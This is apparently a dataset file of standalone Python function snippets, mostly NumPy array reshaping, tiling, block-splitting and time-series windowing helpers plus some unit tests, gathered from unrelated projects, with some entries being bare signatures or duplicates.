"def loop(array, length):\n if len(array) < length:\n array = np.asanyarray(array)\n if len(array) == 0:\n return np.zeros((length,) + array.shape[1:], dtype=array.dtype)\n factor = length // len(array)\n if factor > 1:\n array = np.tile(array, (factor,) + (1,) * (array.ndim - 1))\n missing = length - len(array)\n if missing:\n array = np.concatenate((array, array[:missing:]))\n return array",
"def time_array():\n # Each mushroom is a non-zero value in the 2D array\n world = [[0 for _ in range(20)] for _ in range(20)]\n positions = list_of_positions()\n for (x, y) in positions:\n world[x][y] = random.randrange(1, 1000)\n\n time_start = time.time()\n\n # Iterate through the world,\n # incrementing each \"mushroom\"\n for x in range(20):\n for y in range(20):\n if world[x][y] > 0:\n world[x][y] += 1\n\n time_end = time.time()\n return time_end - time_start",
"def changeArray(array):\r\n\r\n return [[float(array[j][i]) for j in range(len(array))] for i in range(len(array[0]))]",
"def num_44():\n def block_array(a, rows=3, cols=4, col_first=True, nodata=-1):\n \"\"\" a variant on array_split\n requires a N*m array\n \"\"\"\n s = np.array(a.shape)\n w = np.array([rows, cols])\n m = divmod(s, w)\n new_shape = w*m[0] + w*(m[1]!=0)\n ypad, xpad = new_shape - a.shape \n b = np.pad(a, pad_width=((0, ypad),(0, xpad)), \n mode='constant', \n constant_values=((nodata, nodata),(nodata, nodata)))\n rn, cn = new_shape\n x_s = np.arange(0, cn+cols, cols)[1:] #.tolist()\n y_s = np.arange(0, rn+rows, rows)[1:] #.tolist()\n print(\"x_s {}\\ny_s {}\".format(x_s, y_s))\n #c = np.array([i for i in np.hsplit(b, x_s) if len(i) > 0])\n c = np.array([i for i in np.split(b, x_s, axis=1) if len(i) > 0])\n d = np.array([i for i in np.split(c, y_s, axis=1) if len(i) > 0])\n e = d.swapaxes(0, 1)\n ix = np.in1d(e.ravel(), nodata).reshape(e.shape)\n f = np.ma.array(e, mask=ix, fill_value=-1)\n return b, c, d, e, f\n y, x = 9, 11\n a = np.arange(x*y).reshape(y,x)\n b, c, d, e, f = block_array(a)\n print(\"\\n{}\".format(num_44.__doc__)) \n for i in [a, b, c, d, e, f]:\n _f(i)\n return a, b, c, d, e, f",
"def _process(self, data: np.ndarray) -> np.ndarray:",
"def _process(self, data: np.ndarray) -> np.ndarray:",
"def block_array(a, rows=3, cols=4, col_first=True, nodata=-1):\n s = np.array(a.shape)\n w = np.array([rows, cols])\n m = divmod(s, w)\n new_shape = w*m[0] + w*(m[1]!=0)\n ypad, xpad = new_shape - a.shape \n b = np.pad(a, pad_width=((0, ypad),(0, xpad)), \n mode='constant', \n constant_values=((nodata, nodata),(nodata, nodata)))\n rn, cn = new_shape\n x_s = np.arange(0, cn+cols, cols)[1:] #.tolist()\n y_s = np.arange(0, rn+rows, rows)[1:] #.tolist()\n print(\"x_s {}\\ny_s {}\".format(x_s, y_s))\n #c = np.array([i for i in np.hsplit(b, x_s) if len(i) > 0])\n c = np.array([i for i in np.split(b, x_s, axis=1) if len(i) > 0])\n d = np.array([i for i in np.split(c, y_s, axis=1) if len(i) > 0])\n e = d.swapaxes(0, 1)\n ix = np.in1d(e.ravel(), nodata).reshape(e.shape)\n f = np.ma.array(e, mask=ix, fill_value=-1)\n return b, c, d, e, f",
"def _is_1d_varray(arr):\r\n return len(arr.shape) < 2 or arr.shape[1] == 1",
"def transform(self, x: Array2D) -> Array2D:",
"def append_time_dim(arr, y_, time_stamps):\n time_arr = np.zeros([arr.shape[0]-time_stamps, int(time_stamps*arr.shape[1])])\n for time_idx, time_ in enumerate(np.arange(time_stamps, arr.shape[0])):\n for time_point in range(time_stamps):\n time_arr[time_idx, time_point*arr.shape[1]:(time_point+1)*arr.shape[1]] = arr[time_-time_point,:]\n return time_arr, y_[time_stamps:]",
"def __call__(self, array, axis=None):\n raise NotImplementedError()",
"def really1d(arr):\n if np.ndim(arr) != 1:\n return False\n # Empty list or array\n if len(arr) == 0:\n return True\n if np.any(np.vectorize(np.ndim)(arr)):\n return False\n return True",
"def a(a,N): \n a=np.ravel(a, order='F') # Same order\n return a",
"def a(a,N): \n a=np.ravel(a, order='F') # Same order\n return a",
"def ns_tarray_to_sFlat(t_arr, DEPTH = 2, iftime = False):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n # print(\"tarr : \", t_arr)\n do = 1 if iftime else 0\n print(\"do : \", do)\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n interv = 0\n sflat.append([])\n # sflat[i].append([0 for _ in range(DEPTH)])\n if iftime: \n abvp = [t_arr[0, 0, 3]]\n abvp.extend(list([0 for _ in range(DEPTH)]))\n else: abvp = [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm, dep = -1, do # tm -1 initiator\n \n # print(\"sFlat -____________- : \", sflat[i][0])\n\n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH + do: \n dep = do\n if ctime == t_arr[i, j, 0] and dep == do: \n continue\n elif ctime != t_arr[i, j, 0]:\n\n if iftime: \n abvp= [t_arr[i, j, 3]]\n abvp.extend([0 for _ in range(DEPTH)])\n else: abvp= [0 for _ in range(DEPTH)]\n sflat[i].append(abvp)\n tm += 1\n dep = do\n if ctime + interv != t_arr[i, j, 0]:\n sflat[i][tm][1] = 0\n dep = do\n ctime += interv\n continue\n # print(\"DEP : \", dep, len(sflat[i][tm]), iftime)\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n interv = t_arr[i, j, 3]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n\n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH + do), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr",
"def array(self):",
"def np_collapse_freq_into_time(x):\n if x.ndim == 4:\n return np.reshape(x, [x.shape[0], x.shape[1] * x.shape[2], -1])\n return np.reshape(x, [x.shape[0], x.shape[1] * x.shape[2]])",
"def trans(array,dim):\n return array[filter(lambda x: x != dim,range(len(array)) ) ]",
"def one_dim(a: cython.double[:]):\n a[0] *= 2\n return a[0], a.ndim",
"def a_subarray_in_the_idle_state():",
"def _is_1d_harray(arr):\r\n return len(arr.shape) < 2 or arr.shape[0] == 1",
"def _np_apply_along_axis(func1d, axis: int, arr: np.ndarray) -> np.ndarray:\n\n assert arr.ndim == 2\n assert axis in [0, 1]\n\n if axis == 0:\n result = np.empty(arr.shape[1])\n for i in range(len(result)):\n result[i] = func1d(arr[:, i])\n return result\n\n result = np.empty(arr.shape[0])\n for i in range(len(result)):\n result[i] = func1d(arr[i, :])\n\n return result",
"def process(self, mat):",
"def matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):\n\n\n\n matrix_test_num = len(subject_array)//(side_length**2)\n matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]\n ind_test_array = subject_array[matrix_test_num*side_length**2:, :]\n \n ind_idx = []\n \n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in (temp_batch[i,:,1]):\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i,:,0])\n else:\n if min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in (temp_batch[:,i,1]):\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:,i,0])\n else:\n if min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n \n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype = bool)\n mask[ind_idx] = True\n mask[matrix_test_num*side_length**2:] = True\n ind_test_array = subject_array[mask,:]\n \n \n neg_array = subject_array[~mask, :]\n \n\n \n \n neg_array[:, 1] = 0\n \n ind_test, ind_con = conventional_test(ind_test_array,\n typeII_error, typeI_error, repeat = ind_repeat, seq = seq)\n \n \n \n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, ind_test))\n result = result[result[:, 0].argsort()]\n \n return (result, batch_test_num + ind_con, ind_con)",
"def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout",
"def build_timeseries(mat, y_col_index):\n # total number of time-series samples would be len(mat) - TIME_STEPS\n dim_0 = mat.shape[0] - TIME_STEPS #determine number of inputs that have an output because you'll not have data timesteps forward once your index goes past len(mat.shape[0]) - TIME_STEPS\n dim_1 = mat.shape[1] #number of columns in dataset\n x = np.zeros((dim_0, TIME_STEPS, dim_1)) #create an array with dimensions of viable inputs, the time step, the cols in the dataset\n y = np.zeros((dim_0,)) #create an array length of viable inputs\n\n for i in range(dim_0): #for each viable input\n x[i] = mat[i:TIME_STEPS+i] #set the input array to a set of data the length of a timestep\n y[i] = mat[TIME_STEPS+i, y_col_index] #set output array that correalates with inout array to that data located in the y_col_index of the data\n #print(\"length of time-series i/o\",x.shape,y.shape)\n return x, y",
"def num_43():\n \n def block(a, r=3, cs=3, row_order=True):\n \"\"\"Block slice an array using a window of (rs, cs) size\n \"\"\"\n lenr = a.shape[0]//rs\n lenc = a.shape[1]//cs\n if row_order:\n iter = [(i, j) for (i, j) in np.ndindex(lenr, lenc)]\n else:\n iter = [(j, i) for (i, j) in np.ndindex(lenr, lenc)]\n b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] for (i,j) in iter])\n #b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (i, j) in np.ndindex(lenr, lenc)])\n return b\n r = 6\n c = 6\n a = np.arange(r*c).reshape(r, c)\n vs = np.array(np.vsplit(a, 2))\n hs = np.array(np.hsplit(a, 2))\n #a.squeeze(axis=(2,3))\n rs = 3\n cs = 4\n #lenr = a.shape[0]//rs\n #lenc = a.shape[1]//cs\n #b = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (i, j) in np.ndindex(lenr, lenc)])\n #b1 = np.array([a[i*rs:(i+1)*rs, j*cs:(j+1)*cs] \n # for (j, i) in np.ndindex(lenr, lenc)])\n e = block(a, 3, 4, row_first=False)\n b = block(a, rs, cs, True)\n b1 = block(a, rs, cs, False)\n c = np.array([np.vsplit(i, 2) for i in np.hsplit(a, 2)])\n d = np.array([np.hsplit(i, 2) for i in np.vsplit(a, 2)])\n #c = c.reshape(lenr*lenc, rs, cs) \n return a, b, b1, c, d, e",
"def victorylap(array):\n for i in range(0, array.len()):\n array.peek(i, False, True, 0.01) # Run it slower",
"def test_TimeArray_convert_unit():",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def sf01(arr):\n s = arr.shape\n return arr.swapaxes(0, 1).reshape(s[0] * s[1], *s[2:])",
"def resetTimeSinceLastIntegration(subarray=DEFAULT) :\n multiSubarray('resetTimeSinceLastIntegration', subarray)",
"def return_iterated_array_result(self, iterated_array: Array2D) -> Array2D:\r\n\r\n iterated_array_1d = array_2d_util.array_2d_slim_from(\r\n mask_2d=self.mask, array_2d_native=iterated_array, sub_size=1\r\n )\r\n\r\n return Array2D(values=iterated_array_1d, mask=self.mask.derive_mask.sub_1)",
"def test_hk_getdata_timeline_array_type(self):\n _, timelines = load_data(self._file)\n assert isinstance(timelines['group0']['t'], np.ndarray)",
"def steppify(arr, axis='x'):\n\t\n\tif axis == 'x':\n\t\tnewarr = np.r_[arr[0], np.dstack((arr[1:], arr[1:])).flatten()]\n\t\n\telif axis == 'y':\n\t\tnewarr = np.r_[np.dstack((arr[:-1], arr[:-1])).flatten(), arr[-1]]\n\t\n\telse:\n\t\tprint('your axes in steppify are improperly identified')\n\n\treturn newarr",
"def feature_processing(array2d):\n new_array2d = np.zeros([array2d.shape[0], 29])\n # items/ orders\n new_array2d[:, 0] = array2d[:, 4] / array2d[:, 3]\n # cancels / orders\n new_array2d[:, 1] = array2d[:, 5] / array2d[:, 3]\n # returns / items\n new_array2d[:, 2] = array2d[:, 6] / array2d[:, 4]\n # voucher / orders\n new_array2d[:, 3] = array2d[:, 10] / array2d[:, 3]\n # female_items / female_items + male_items\n new_array2d[:, 4] = array2d[:, 15] / ([1 if x == 0 else x for x in (array2d[:, 15] + array2d[:, 16])])\n # male_items / female_items + male_items\n new_array2d[:, 5] = array2d[:, 16] / ([1 if x == 0 else x for x in (array2d[:, 15] + array2d[:, 16])])\n # unisex_items / items\n new_array2d[:, 6] = array2d[:, 17] / array2d[:, 4]\n # wapp_items / items\n new_array2d[:, 7] = array2d[:, 18] / array2d[:, 4]\n # wftw_items / items\n new_array2d[:, 8] = array2d[:, 19] / array2d[:, 4]\n # mapp_items / items\n new_array2d[:, 9] = array2d[:, 20] / array2d[:, 4]\n # wacc_items / items\n new_array2d[:, 10] = array2d[:, 21] / array2d[:, 4]\n # macc_items / items\n new_array2d[:, 11] = array2d[:, 22] / array2d[:, 4]\n # mftw_items / items\n new_array2d[:, 12] = array2d[:, 23] / array2d[:, 4]\n # wspt_items / items\n new_array2d[:, 13] = array2d[:, 24] / array2d[:, 4]\n # mspt_items / items\n new_array2d[:, 14] = array2d[:, 25] / array2d[:, 4]\n # curvy_items / items\n # Curvy item has a strong correlation with gender, however they are very right-skewed use np.power(1/6) to smooth it\n new_array2d[:, 15] = np.power(array2d[:, 26] / array2d[:, 4], 1 / 6)\n # sacc_items / items\n new_array2d[:, 16] = array2d[:, 27] / array2d[:, 4]\n # msite_orders / orders\n new_array2d[:, 17] = array2d[:, 28] / array2d[:, 3]\n # desktop_orders / orders\n new_array2d[:, 18] = array2d[:, 29] / array2d[:, 3]\n # android_orders / orders\n new_array2d[:, 19] = array2d[:, 30] / array2d[:, 3]\n # ios_orders / orders\n new_array2d[:, 20] = array2d[:, 31] / array2d[:, 3]\n # other_device_orders / orders\n new_array2d[:, 21] = array2d[:, 32] / array2d[:, 3]\n # work_orders / orders\n new_array2d[:, 22] = array2d[:, 33] / array2d[:, 3]\n # home_orders / orders\n new_array2d[:, 23] = array2d[:, 34] / array2d[:, 3]\n # parcelpoint_orders / orders\n new_array2d[:, 24] = array2d[:, 35] / array2d[:, 3]\n # other_collection_orders / orders\n new_array2d[:, 25] = array2d[:, 36] / array2d[:, 3]\n # average_discount_onoffer\n new_array2d[:, 26] = array2d[:, 39]\n # average_discount_used\n new_array2d[:, 27] = array2d[:, 40]\n # revenue / order\n new_array2d[:, 28] = array2d[:, 41] / array2d[:, 3]\n\n # normalize by each feature\n new_array2d = normalize(new_array2d, axis=0, norm='max')\n return new_array2d",
"def IterRows(a: numpy.ndarray) -> t.Iterable[numpy.ndarray]:\n for row in a:\n return row[:, numpy.newaxis]",
"def data(self, arr):\n self.bitmap(arr, 1)",
"def solution(array):\n rows = array.shape[0]\n cols = array.shape[1]\n result = np.ones((rows,cols))\n result[1:rows-1,1:cols-1] = 0\n return result",
"def flatten_npar(np_array):\n \n itr = len(np_array)\n start = np_array[0]\n \n for i in range(1,itr):\n start = np.hstack((start,np_array[i]))\n \n return(np.array(start))",
"def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if out_arr.shape != (3,):\n out_arr = out_arr.view(np.ndarray)\n return out_arr",
"def array_input(f):\n @wraps(f)\n def wrapped(self, t):\n t = np.atleast_1d(t)\n r = f(self, t)\n return r\n return wrapped",
"def _check_input_timeseries(x: np.ndarray) -> np.ndarray:\n if not isinstance(x, np.ndarray):\n raise ValueError(\"The input time series must be a numpy array.\")\n if x.ndim <= 0 or x.ndim >= 4:\n raise ValueError(\n \"The input time series must have more than 0 dimensions and\"\n \"less than 4 dimensions.\"\n )\n if x.ndim == 3:\n return x[0]\n return x",
"def double(arr):\n newarr = np.array([(xx,xx) for xx in arr]).ravel()\n return newarr",
"def test__chk_asarray(self):\r\n\r\n exp = (array([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]), 0)\r\n obs = _chk_asarray([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]], 0)\r\n assert_almost_equal(obs[0], exp[0])\r\n self.assertEqual(obs[1], exp[1])",
"def create_array( n ):",
"def sampling(self,arr):\n H=0\n W=0\n if arr.shape[0]%2 == 0:\n H = arr.shape[0]/2\n else:\n H = 1+arr.shape[0]/2\n\n if arr.shape[1]%2 == 0:\n W = arr.shape[1]/2\n else:\n W = 1+arr.shape[1]/2\n \n new_arr = numpy.zeros((H,W),dtype = numpy.int)\n for i in range(H):\n for j in range(W):\n new_arr[i][j] = arr[2*i][2*j]\n return new_arr",
"def assure_2d(array):\n array = np.array(array, copy=False, subok=True, ndmin=1)\n if array.ndim == 2:\n return array\n elif array.ndim == 1:\n return array[:, np.newaxis]\n else:\n raise RuntimeError(\"Array must be 1 or 2 dimensional.\")",
"def test_array(self):\n htype = h5t.py_create(('f',(2,2)))\n self.assertIsInstance(htype, h5t.TypeArrayID)\n self.assertEqual(htype.get_array_dims(), (2,2))",
"def sum1(arr_in):\n assert arr_in.ndim == 2\n assert arr_in.dtype == 'float32'\n n_rows, n_cols = map(int, arr_in.shape)\n arr_in = np.asarray(arr_in)\n arr_out = np.empty(n_rows, dtype=arr_in.dtype)\n code = r\"\"\"\n int i, j;\n float sum;\n omp_set_num_threads(8);\n #pragma omp parallel for default(shared) private(j)\n for(j=0; j<n_rows; ++j) {\n sum = 0;\n //#pragma omp parallel for default(shared) private(i) reduction(+:sum)\n for(i=0; i<n_cols; ++i)\n sum += arr_in[j*n_cols + i];\n arr_out[j] = sum;\n }\n \"\"\"\n weave.inline(\n code,\n ['arr_in','arr_out','n_rows', 'n_cols'],\n extra_compile_args=[\n \"-fopenmp\",\n \"-pthread\",\n \"-O6\",\n \"-march=native\",\n \"-mtune=native\",\n \"-funroll-all-loops\",\n \"-fomit-frame-pointer\",\n \"-march=native\",\n \"-mtune=native\",\n \"-msse4\",\n \"-ftree-vectorize\",\n \"-ftree-vectorizer-verbose=5\",\n \"-ffast-math\",\n \"-ftree-loop-distribution\",\n \"-funroll-loops\",\n \"-ftracer\",\n\n ],\n verbose=2,\n support_code = \\\n r\"\"\"\n #include <stdio.h>\n #include <omp.h>\n #include <math.h>\n \"\"\",\n libraries=['gomp'])\n return arr_out",
"def iterate_over_celestial_slices(array_in, array_out, wcs):\n\n # First put lng/lat as first two dimensions in WCS/last two in Numpy\n if wcs.wcs.lng == 0 and wcs.wcs.lat == 1:\n array_in_view = array_in\n array_out_view = array_out\n elif wcs.wcs.lng == 1 and wcs.wcs.lat == 0:\n array_in_view = array_in.swapaxes(-1, -2)\n array_out_view = array_out.swapaxes(-1, -2)\n else:\n array_in_view = array_in.swapaxes(-2, -1 - wcs.wcs.lat).swapaxes(-1, -1 - wcs.wcs.lng)\n array_out_view = array_out.swapaxes(-2, -1 - wcs.wcs.lat).swapaxes(-1, -1 - wcs.wcs.lng)\n\n # Flatten remaining dimensions to make it easier to loop over\n from operator import mul\n\n nx_in = array_in_view.shape[-1]\n ny_in = array_in_view.shape[-2]\n n_remaining_in = reduce(mul, array_in_view.shape, 1) // nx_in // ny_in\n\n nx_out = array_out_view.shape[-1]\n ny_out = array_out_view.shape[-2]\n n_remaining_out = reduce(mul, array_out_view.shape, 1) // nx_out // ny_out\n\n if n_remaining_in != n_remaining_out:\n raise ValueError(\"Number of non-celestial elements should match\")\n\n array_in_view = array_in_view.reshape(n_remaining_in, ny_in, nx_in)\n array_out_view = array_out_view.reshape(n_remaining_out, ny_out, nx_out)\n\n for slice_index in range(n_remaining_in):\n yield array_in_view[slice_index], array_out_view[slice_index]",
"def Repeater(arr,n):\n new_arr = np.zeros((arr.shape[0]*n,arr.shape[1]),dtype=object)\n for i in range(0,arr.shape[0]):\n new_row = np.tile(arr[i,:],(n,1))\n new_arr[i*n:(i+1)*n,:] = new_row\n return new_arr",
"def two_dim(a: cython.double[:,:]):\n a[0,0] *= 3\n return a[0,0], a[0,1], a.ndim",
"def identity( array ):\n return _myarray.identity( array )",
"def test_TimeArray_repr():",
"def test_reference_to_array(self):\n arr = numpy.arange(0.0, 10.0, 0.1)\n arr = numpy.reshape(arr, (25, 4))\n vtk_arr = array_handler.array2vtk(arr)\n arr1 = array_handler.vtk2array(vtk_arr)\n # Now make sure these are using the same memory.\n arr[0][0] = 100.0\n self.assertEqual(arr[0][0], arr1[0][0])\n self.assertEqual(arr.shape, arr1.shape)",
"def test_arr2cell_array(self):\n # Test list of lists.\n a = [[0], [1, 2], [3, 4, 5], [6, 7, 8, 9]]\n cells = array_handler.array2vtkCellArray(a)\n z = numpy.array([1, 0, 2, 1,2, 3, 3,4,5, 4, 6,7,8,9])\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(len(arr.shape), 1)\n self.assertEqual(len(arr), 14)\n\n # Test if optional argument stuff also works.\n cells = vtk.vtkCellArray()\n ident = id(cells)\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(id(cells), ident)\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Make sure this resets the cell array and does not add to the\n # existing list!\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Test Numeric array handling.\n N = 3\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([3, 0, 1, 2]*3, numpy.int) \n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N)\n\n # Test if a list of Numeric arrays of different cell lengths works.\n l_a = [a[:,:1], a, a[:2,:2]]\n cells = array_handler.array2vtkCellArray(l_a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([1, 0]*3 + [3, 0, 1, 2]*3 + [2, 0,1]*2, numpy.int)\n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N*2 + 2)\n\n # This should not take a long while. This merely tests if a\n # million cells can be created rapidly.\n N = int(1e6)\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n self.assertEqual(cells.GetNumberOfCells(), N)",
"def n2m(a):\n if not isinstance(a, np.ndarray): a = np.array(a)\n return multiprocessing.Array(a.dtype.char, a.flat, lock=False), tuple(a.shape), a.dtype.char, isinstance(a, np.matrix)",
"def test06(self):\n a = np.arange(1e5)\n b = bcolz.carray(a, chunklen=10000, rootdir=self.rootdir)\n sl = -2 # second last element\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")\n sl = -1 # last element\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")",
"def wrap(array):\n\t\t\t\n\t\t\tassert array.ndim == 2, ('works on 2D arrays only; expecting '\n\t\t\t\t\t\t\t\t\t 'self.cond_tuning, which should be 2D')\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\treturn np.column_stack((array, array[..., 0]))",
"def extract_into_tensor(arr, timesteps, broadcast_shape):\n device = timesteps.device\n assert arr.device == device\n res = arr[timesteps].float()\n new_dims = [1] * (len(broadcast_shape) - res.ndim)\n res = res.view(*res.shape, *new_dims)\n return torch.broadcast_to(res, broadcast_shape)",
"def time_delay_embed(array, dimension, time_dif):\r\n emb = array.values # Converts the panda dataframe to an array\r\n emb = np.squeeze(np.asarray(emb)) # Make a 1-d array of all values\r\n i = len(emb) - 1 # sets up a counter\r\n new_vec = [] # target for each row\r\n embed = [] # target for full set\r\n while i >= dimension-1:\r\n a = 0 # the dimensional counter\r\n b = 0 # time_dif counter\r\n while a< dimension:\r\n new_vec.append(emb[i-b])\r\n a+=1\r\n b+= time_dif\r\n embed.append(new_vec)\r\n new_vec = []\r\n i -=1\r\n \r\n X = np.array(embed)\r\n \r\n return np.flipud(X)",
"def numpy_to_cube(np_array, similar_cube, dimensions):\n\n new_cube = iris.cube.Cube.copy(similar_cube) # copy similar cube\n\n # time, lat, lon\n if dimensions == 3:\n new_cube.data[:,:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:,:] = np_array # fill with numpy array data\n\n # lat, lon\n elif dimensions == 2:\n new_cube.data[:,:] = np.nan # convert new cube entries to nan\n new_cube.data[:,:] = np_array # fill with numpy array data\n\n # either time, lat or lon only\n elif dimensions == 1:\n new_cube.data[:] = np.nan # convert new cube entries to nan\n new_cube.data[:] = np_array # fill with numpy array data\n\n # return the numpy array, failed to convert to a cube\n else:\n print('failed to convert')\n new_cube = np_array\n\n return new_cube",
"def check_array(arr: Arrayable) -> np.ndarray:\n if isinstance(arr, np.ndarray):\n return arr\n return np.array(arr)",
"def test_nrows_gtiff_array(self):\n self.assertEqual(_test_array(landsat_gtiff).shape[1], 224)",
"def dataArr(filename):\r\n #Open the file\r\n f=h5py.File(filename,'r')\r\n \r\n #Initialize the data arrays\r\n cdata=[]\r\n idxset=[]\r\n vertices=[]\r\n \r\n #Open groups in the file\r\n for group in f.keys():\r\n# print('Group- '+group)\r\n \r\n #Get the group\r\n currGroup=f[group]\r\n \r\n #Open keys in the group\r\n for key in currGroup.keys():\r\n# print('Key- '+key)\r\n \r\n #Append the data to the respective arrays\r\n if key=='cdata(Complex)':\r\n cdataGroup=currGroup[key]\r\n \r\n imag=[]\r\n real=[]\r\n #Open the keys in cdata\r\n for subkey in cdataGroup.keys():\r\n# print('Subkey- '+subkey)\r\n \r\n #Get the real and imaginary parts of the array\r\n if subkey=='Imag':\r\n imag=cdataGroup[subkey][()]\r\n elif subkey=='Real':\r\n real=cdataGroup[subkey][()]\r\n \r\n #Convert lists to numpy arrays\r\n imag=np.array(imag)\r\n real=np.array(real)\r\n #Get the cdata value\r\n cdata=real+1j*imag\r\n \r\n elif key=='idxset':\r\n idxset=currGroup[key][()]\r\n elif key=='vertices':\r\n vertices=currGroup[key][()]\r\n \r\n #Remove the y component from the vertices\r\n xVals=[]\r\n yVals=[]\r\n newVertices=[]\r\n for vertex in vertices:\r\n xVals.append(vertex[0])\r\n yVals.append(vertex[2])\r\n newVertices.append([vertex[0],vertex[1]])\r\n vertices=newVertices\r\n \r\n #Convert to numpy arrays\r\n cdata=np.array(cdata)\r\n xVals=np.array(xVals)\r\n yVals=np.array(yVals)\r\n \r\n #Close the file\r\n f.close()\r\n \r\n return cdata, xVals, yVals",
"def arrayManipulation_brute(n, queries):\n arr = [0] * n\n\n for i, row in enumerate(queries):\n a, b, k = row[0], row[1], row[2]\n for j in range(a - 1, b):\n arr[j] = arr[j] + k\n print(f'array size {arr.__sizeof__()/1000000}')\n return max(arr)",
"def ns_tarray_to_sFlat2(t_arr, DEPTH = 2):\n sflat = []\n tm, tm_max, dep = 0, 0, 0\n lis = t_arr.tolist()\n for i in range(t_arr.shape[0]):\n ctime, aflag = -1, False\n sflat.append([])\n sflat[i].append([0 for _ in range(DEPTH)])\n \n tm, dep = -1, 0 # tm -1 initiator\n \n st_arr = sorted(lis[i], key=lambda x: x[0] if x[0] != 0 else sys.maxsize)\n\n t_arr = numpy.array([st_arr])\n\n for j in range(t_arr.shape[1]):\n if dep == DEPTH: \n dep = 0\n # tm += 1\n # sflat[i].append([0 for _ in range(SPREAD)])\n if ctime == t_arr[i, j, 0] and dep == 0: \n continue\n elif ctime != t_arr[i, j, 0]:\n sflat[i].append([0 for _ in range(DEPTH)])\n tm += 1\n dep = 0\n\n sflat[i][tm][dep] = int(t_arr[i, j, 1])\n ctime = t_arr[i, j, 0]\n dep += 1\n \n tm_max = max([len(v) for v in sflat])\n \n #triming the array\n sflat_arr = numpy.zeros((t_arr.shape[0], tm_max + 1, DEPTH), dtype = 'int32') #because tm_max is zeo based indexing\n for i in range(sflat_arr.shape[0]):\n for j in range(len(sflat[i])):\n for k in range(sflat_arr.shape[2]):\n sflat_arr[i, j, k] = sflat[i][j][k]\n return sflat_arr",
